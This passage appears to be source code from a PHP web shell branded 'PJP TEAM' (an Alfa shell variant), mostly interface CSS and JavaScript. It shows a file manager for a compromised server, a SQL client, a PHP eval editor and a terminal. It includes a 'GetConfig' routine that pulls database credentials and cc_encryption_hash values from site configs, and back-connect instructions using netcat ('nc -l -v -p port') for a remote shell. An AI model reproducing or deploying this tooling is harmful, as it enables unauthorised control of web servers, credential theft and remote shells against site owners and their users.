.tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}
  1044. <?php echo '
  1045. @keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
  1046. @-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
  1047. @-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
  1048. @-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
  1049. #alfaloader{'.$csscode.'width:100px;height:100px;}
  1050. #a_loader img{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
  1051. .ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(https://i.imgur.com/7aRsK2p.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
  1052. .foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}'.alfaCssLoadColors().'
  1053. </style>';
  1054. echo "<script type='text/javascript'>
  1055. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  1056. var a_ = '" . htmlspecialchars(@$_POST['a']) ."';
  1057. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  1058. var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
  1059. var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";";?>
  1060. var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><arow="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&amp;path="+c_+"&amp;file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">PJP TEAM</div><div class="alfa-ajax-error"></div><img src=\'https://i.imgur.com/7aRsK2p.png'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function 